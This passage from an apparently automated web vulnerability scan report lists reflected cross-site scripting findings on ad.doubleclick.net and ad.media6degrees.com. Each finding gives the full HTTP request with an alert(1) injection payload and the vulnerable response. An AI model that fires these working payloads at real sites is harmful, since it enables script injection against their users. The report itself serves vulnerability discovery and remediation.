<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
AA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-839613e2e6"-alert(1)-"2470cde73b&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "o
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eed4"-alert(1)-"3d107a4253e was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F8eed4"-alert(1)-"3d107a4253e&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:59:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7280

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F8eed4"-alert(1)-"3d107a4253e&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var win
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/N6457.133080.LOTAME/B4840137 [click0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6457.133080.LOTAME/B4840137

Issue detail

The value of the click0 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2beb5'-alert(1)-'e161e8ec7a7 was submitted in the click0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6457.133080.LOTAME/B4840137;click0=2beb5'-alert(1)-'e161e8ec7a7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://twittorati.com/?7903e'%3balert(1)//5a7f48cb57e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 273
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 09 Feb 2011 14:10:10 GMT
Expires: Wed, 09 Feb 2011 14:10:10 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa9/14/1c/%2a/y;44306;0-0;0;58835764;1-468/60;0/0/0;;~sscs=%3f2beb5'-alert(1)-'e161e8ec7a7"><img src="http://s0.2mdn.net/
...[SNIP]...

1.17. http://ad.doubleclick.net/adj/N6457.133080.LOTAME/B4840137.2 [click0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6457.133080.LOTAME/B4840137.2

Issue detail

The value of the click0 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb169'-alert(1)-'a0fee229f25 was submitted in the click0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6457.133080.LOTAME/B4840137.2;click0=eb169'-alert(1)-'a0fee229f25 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://twittorati.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 273
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 09 Feb 2011 14:08:19 GMT
Expires: Wed, 09 Feb 2011 14:08:19 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa9/14/1c/%2a/k;44306;0-0;0;58835784;1-468/60;0/0/0;;~sscs=%3feb169'-alert(1)-'a0fee229f25"><img src="http://s0.2mdn.net/
...[SNIP]...

1.18. http://ad.doubleclick.net/adj/cm.appnexus/nikon_ron_cpm [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.appnexus/nikon_ron_cpm

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb425'%3balert(1)//e1a90e0f65e was submitted in the sz parameter. This input was echoed as bb425';alert(1)//e1a90e0f65e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.appnexus/nikon_ron_cpm;sz=bb425'%3balert(1)//e1a90e0f65e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=AQAAAAAA4j-amZmZmZnePwAAAADXo_o_mpmZmZmZ3j8AAAAAAADiP9xIJgq8hAUXBWHfHSmrEEI7n1JNAAAAABuRAwA2AQAANwEAAAIAAABJ9wIA5GoAAAEAAABVU0QAVVNEAKAAWAKoAecEDAcAAgUCAAIAAAAARR2NVAAAAAA.&udj=uf%28%27a%27%2C+11322%2C+1297260347%29%3Buf%28%27c%27%2C+49259%2C+1297260347%29%3Buf%28%27r%27%2C+194377%2C+1297260347%29%3B&cnd=!hhQ2PQjrgAMQye4LGAAg5NUBKOcJMQAAAAAAAOI_QhMIABAAGAAgASj-__________8BSABQAFioA2AAaLcC&referrer=http://technorati.com/contact-us/&custom_macro=SEG_CODES_COL%5Ebtg=an.5%3Bbtg=an.51%3Bbtg=cm.de16_1%3Bbtg=cm.de18_1%3Bbtg=cm.ent_h%3Bbtg=cm.polit_h%3Bbtg=cm.shop_h%3Bbtg=cm.sports_h%3Bbtg=cm.sportsfan%3Bbtg=cm.sportsreg
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 295
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 09 Feb 2011 14:09:37 GMT
Expires: Wed, 09 Feb 2011 14:09:37 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa9/0/0/%2a/v;44306;0-0;0;59862846;255-0/0;0/0/0;;~okv=;sz=bb425';alert(1)//e1a90e0f65e;~aopt=2/0/ee/0;~sscs=%3f"><img sr
...[SNIP]...

1.19. http://ad.doubleclick.net/adj/cm.appnexus/taxact_ron [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.appnexus/taxact_ron

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 848f6'-alert(1)-'c4eace39569 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.appnexus/taxact_ron;sz=300x250;app=taxact_ron;click0=http://ib.adnxs.com/click/hetRuB6F0z8IrBxaZDvPPwAAAMAeheQ_CKwcWmQ7zz-F61G4HoXTP5b8K_pSC9QXBWHfHSmrEEI6n1JNAAAAAGqUAwA2AQAANwEAAAIAAAAmgQIA52oAAAEAAABVU0QAVVNEACwB-gCoAdoEbwQAAQUCAAMAAAAAASH0uQAAAAA./cnd=!ICL11Qi52wIQpoIKGAAg59UBKNoJMYXrUbgehdM_QhMIABAAGAAgASj-__________8BQg0I4D4QhscEGAEgAygCQgsI4D4QABgAIAIoAkINCOE-EPK3TRgTIAMoAkILCOE-EAAYACACKAJIAFAAWKgDYABotwI./referrer=http%3A%2F%2Fblogcritics.org%2F/clickenc=;ord=1297260346?&848f6'-alert(1)-'c4eace39569=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=hetRuB6F0z8IrBxaZDvPPwAAAMAeheQ_CKwcWmQ7zz-F61G4HoXTP5b8K_pSC9QXBWHfHSmrEEI6n1JNAAAAAGqUAwA2AQAANwEAAAIAAAAmgQIA52oAAAEAAABVU0QAVVNEACwB-gCoAdoEbwQAAgUCAAMAAAAAAiEFugAAAAA.&udj=uf%28%27a%27%2C+6877%2C+1297260346%29%3Buf%28%27c%27%2C+44473%2C+1297260346%29%3Buf%28%27r%27%2C+164134%2C+1297260346%29%3Bppv%288032%2C+%271717009808947412118%27%2C+1297260346%2C+1297692346%2C+44473%2C+27367%29%3Bppv%288033%2C+%271717009808947412118%27%2C+1297260346%2C+1297692346%2C+44473%2C+27367%29%3B&cnd=!ICL11Qi52wIQpoIKGAAg59UBKNoJMYXrUbgehdM_QhMIABAAGAAgASj-__________8BQg0I4D4QhscEGAEgAygCQgsI4D4QABgAIAIoAkINCOE-EPK3TRgTIAMoAkILCOE-EAAYACACKAJIAFAAWKgDYABotwI.&referrer=http://blogcritics.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 09 Feb 2011 14:09:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1251

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa9/14/19f/%2a/r;234941401;0-0;1;58796878;4307-300/250;40248019/40265806/1;;~okv=;sz=300x250;app=taxact_ron;click0=http:/
...[SNIP]...
1Qi52wIQpoIKGAAg59UBKNoJMYXrUbgehdM_QhMIABAAGAAgASj-__________8BQg0I4D4QhscEGAEgAygCQgsI4D4QABgAIAIoAkINCOE-EPK3TRgTIAMoAkILCOE-EAAYACACKAJIAFAAWKgDYABotwI./referrer=http://blogcritics.org//clickenc=;;848f6'-alert(1)-'c4eace39569=1;~aopt=2/0/ee/0;~sscs=%3fhttp://ib.adnxs.com/click/hetRuB6F0z8IrBxaZDvPPwAAAMAeheQ_CKwcWmQ7zz-F61G4HoXTP5b8K_pSC9QXBWHfHSmrEEI6n1JNAAAAAGqUAwA2AQAANwEAAAIAAAAmgQIA52oAAAEAAABVU0QAVVNEACwB-gCoAdoEbwQA
...[SNIP]...

1.20. http://ad.doubleclick.net/adj/cm.appnexus/taxact_ron [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.appnexus/taxact_ron

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc312'%3balert(1)//b6400693fbc was submitted in the sz parameter. This input was echoed as fc312';alert(1)//b6400693fbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.appnexus/taxact_ron;sz=fc312'%3balert(1)//b6400693fbc HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=hetRuB6F0z8IrBxaZDvPPwAAAMAeheQ_CKwcWmQ7zz-F61G4HoXTP5b8K_pSC9QXBWHfHSmrEEI6n1JNAAAAAGqUAwA2AQAANwEAAAIAAAAmgQIA52oAAAEAAABVU0QAVVNEACwB-gCoAdoEbwQAAgUCAAMAAAAAAiEFugAAAAA.&udj=uf%28%27a%27%2C+6877%2C+1297260346%29%3Buf%28%27c%27%2C+44473%2C+1297260346%29%3Buf%28%27r%27%2C+164134%2C+1297260346%29%3Bppv%288032%2C+%271717009808947412118%27%2C+1297260346%2C+1297692346%2C+44473%2C+27367%29%3Bppv%288033%2C+%271717009808947412118%27%2C+1297260346%2C+1297692346%2C+44473%2C+27367%29%3B&cnd=!ICL11Qi52wIQpoIKGAAg59UBKNoJMYXrUbgehdM_QhMIABAAGAAgASj-__________8BQg0I4D4QhscEGAEgAygCQgsI4D4QABgAIAIoAkINCOE-EPK3TRgTIAMoAkILCOE-EAAYACACKAJIAFAAWKgDYABotwI.&referrer=http://blogcritics.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 295
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 09 Feb 2011 14:09:18 GMT
Expires: Wed, 09 Feb 2011 14:09:18 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa9/0/0/%2a/x;44306;0-0;0;58796878;255-0/0;0/0/0;;~okv=;sz=fc312';alert(1)//b6400693fbc;~aopt=2/0/ee/0;~sscs=%3f"><img sr
...[SNIP]...

1.21. http://ad.media6degrees.com/adserv/cs [adType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the adType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 467de"><script>alert(1)</script>0330d190362 was submitted in the adType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?adType=iframe|is_preview=0|cId=4814|ec=1|spId=19013|advId=651|tpCId=153250|exId=9|price=0.200000|vurlId=424|srcUrlEnc=http://technorati.com/contact-us/?bd8fa%22%3E%3Cscript%3Ealert(1)%3C/script%3E09ae0dbaead=1|notifyServer=asd132.sd.pl.pvt|notifyPort=8080|bid=0.20000000298023224|tId=6210453202168737|pubId=51|invId=117|secId=56|tpSecId=233753|foo=bar|cb=1297260612|ctrack=http://ib.adnxs.com/click/AQAAoJmZyT-amZlhj8LFPwAAAKCZmfE_mpmZYY_CxT8AAACgmZnJP8giKVhwODcdBWHfHSmrEEJEoFJNAAAAABmRAwA2AQAAfAAAABkAAACiVgIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEoQMAAgUCAAIAAAAAMiEewAAAAAA./cnd=%257B%255C%2522m6ClientId%255C%2522:835342505348660275,%255C%2522transactionId%255C%2522:6210453202168737,%255C%2522marketerId%255C%2522:651,%255C%2522campaignId%255C%2522:3231,%255C%2522spendId%255C%2522:19013,%255C%2522spendWeight%255C%2522:200,%255C%2522creativeId%255C%2522:4814,%255C%2522spendCreativeId%255C%2522:158392,%255C%2522adProfileId%255C%2522:289%257D/referrer=http%253A%252F%252Ftechnorati.com%252Fcontact-us%252F%253Fbd8fa%252522%25253E%25253Cscript%25253Ealert%25281%2529%25253C%252Fscript%25253E09ae0dbaead%253D1/clickenc=467de"><script>alert(1)</script>0330d190362 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://technorati.com/contact-us/?bd8fa%22%3E%3Cscript%3Ealert(1)%3C/script%3E09ae0dbaead=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=3lebnns040r044nssk122m1boph1c4wn1bw2l1bw321bw2o1bw501bw3n1bw4o1bw3c1bw301bw5f1bw4e1bw381bw3l1bw2m1bw2c1bw351bw481bw2v1bw4h1bw4x1bw4b1bw361bw3z1bw4f1bw4w1bw4g1bw331bw431bw2q1bw4z1bw2b1bw441bw2r1bw5e1bw3f1bw521bw3p1bw5a1bw311bw4r1bw5d1bw5j1bw421bw2p1bw3x1bw5g1bw2i1bw4a1bw3b1bw531bw4p1bw3q1bw541bw3r1bw4q1bw4j1bw461bw2t1bw3m1bw4y1bw4s1bw2z1bw4c1bw2k1bw3v1bw4i1bw4t1bw3a1bw451bw2s1bw2j1bw4n1bw3e1bw591bw3w1bw401bw2n1bw3u1bw341bw4u1bw3k1bw491bw2w1bw5b1bw561bw3t1bw511bw551bw3s1bw471bw2u1bw5i1bw4l3ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z32te12011xg0o4jaec12011ucve1l054e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g1844g184561843t1847c1847g1843f1844a1847v1843m1844m184721845p1848e1844q1848c1843h1842y1847d1848d1844t1845x1847q1845k184711845o1846i1844f184791845w1845d184581844h1843v1847o18434184691845t184531844w1844e184881846v1844v4qbzj12011yfhj4fhux122u000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru000000000000000000000000000000000004esx7120104tej49wpz12011w3py0s018raevpblc12011xh931o018EstvP2qn112s1o9ct1oa791oa5w1oa8b1oa601oa8j1oa6z1oa871oa6u1oa8f1oa7b1oa7l1oa6x1oa8l1oa6m1oa7i1oa8h1oa6h1oa8e1oa5z1oa8s1oa7n1oa6e1oa7k1oa741oa5r1oa7h1oa5l1oa5k1oa611oa7w1oa8g1oa911oa7o1oa5m1oa6l1oa681oa8c1oa5h1oa831oa8o1oa8n1oa7f1oa6f1oa7x1oa721oa771oa701oa7j1oa7a1oa801oa7g1oa6n1oa761oa5t1oa8i1oa841oa8t1oa8m1oa7y1oa921oa5i1oa6y1oa931oa821oa7u1oa941oa8d1oa631oa6t1oa651oa7d1oa8v1oa6j1oa891oa6w1oa5j1oa881oa7t1oa6v1oa7s1oa8z1oa8p1oa811oa6o1oa8u1oa691oa731oa5q1oa6g1oa8q1oa7e1oa5y1oa751oa5s1oa641oa7v1oa781oa5v1oa6k; acs=015020a0e0f0g1lebnnsxzt11xg0oxzt12135dxzt11xqnrxzt11xg0o; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; orblb=2lfk1rn0225810u020lxik0hlmv2dh10u0100000; clid=2lebnns011706ch47d7o8wtv214tf01h1403070f20o; rdrlst=41d0o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000x1blebnns1wj3q01411000w3clebnns1wj3q01411000jv6lebnns1wj3q01411000j4ilew2e20000001b14030fullf8gij00000015140310f6lg1nei0000000n140300c9lfk1rn0000001214031196lfzx0l0000000o14030jillebnns1wj3q01411001195lg7rdq0000000f14031194lg3y5y0000000l14030y7blg94wv0000000614030cajlfk1rn0000001214030p7vlebnns1xgc001b12001192lg5l2h0000000k140310tylg60ji0000000g140310ellg1nei07gla00h12000xuklebnns0000001h140310telg60j60000000i14030yh0lebnns1wj3q014110010e9lg1nei0000000n14030jwblfk1rn0o4zv00p110007dpletz4d0000001d14030mmnlebnns1wj3q014110010e5lg1nei0000000n140310rdlg1vir087mk00m14030mzklgcsh70000000114010eh5lf17qf00000019140306bylemlne0000001f14030df5lgcqt50000000314030mzqlgcsgy00000002140207gmlebnns1wj3q01411000xthlebnns1xgc001b12000im3lgcqt50000000314030fuqlegh2b0000001g14030b6mlf17qk0000001814030mz1lebnns1wj3q01411000y63lg93og00000008140307vglfk1rn0000001214030xvslebnns1wj3q01411000x1jlebnns1wj3q01411000jk7lebnns1wj3q01411000cbnlfk1rn0000001214030yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q0141100; sglst=20f0s0tllegh2b1wbew01g1403070f20o5b0lf17qo000000171403070f20oag2leqh191mbfy01e1403070f20o82hlebnns1ucve00z100006002005q8lebnns1ucve00k10000600200b0clfjpei0pe9y0131403070f20o7gdlgcqt5001o200314030703203b1alfjpei0pe9y0131403070f20ob08lfjpei0pe9y0131403070f20o45mlfdxmc000000141403070f20o5l4lgcqt5001o200314030703203aanlebnns1xg0o00o12000700200b0olfjpei0pe9y00v12000700200ab4lebnns1xg0o01h1403070f20o9szlebnns1xg0o01912000700200

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16033e7s0103901WEF/RAmuh01bkz326030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv2151z01i1404070g20p; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
Set-Cookie: orblb=2lfk1rn0225810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
Set-Cookie: rdrlst=41d0o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000x1blebnns1wj3q01411000w3clebnns1wj3q01411000jv6lebnns1wj3q01411000j4ilew2e20000001c14040fullf8gij00000016140410f6lg1nei0000000o140400c9lfk1rn0000001314041196lfzx0l0000000p14040jillebnns1wj3q01411001195lg7rdq0000000g14041194lg3y5y0000000m14040y7blg94wv0000000714040cajlfk1rn0000001314040p7vlebnns1xgc001b12001192lg5l2h0000000l140410tylg60ji0000000h140410ellg1nei07gla00h12000xuklebnns0000001i14040yh0lebnns1wj3q014110010telg60j60000000j140410e9lg1nei0000000o14040jwblfk1rn0o4zv00p110007dpletz4d0000001e14040mmnlebnns1wj3q014110010e5lg1nei0000000o140410rdlg1vir087mk00n14040mzklgcsh70000000214020eh5lf17qf0000001a140406bylemlne0000001g14040df5lgcqt50000000414040mzqlgcsgy00000003140307gmlebnns1wj3q01411000xthlebnns1xgc001b12000im3lgcqt50000000414040fuqlegh2b0000001h14040b6mlf17qk0000001914040mz1lebnns1wj3q01411000y63lg93og00000009140407vglfk1rn0000001314040xvslebnns1wj3q01411000x1jlebnns1wj3q01411000jk7lebnns1wj3q01411000cbnlfk1rn0000001314040yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q0141100; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
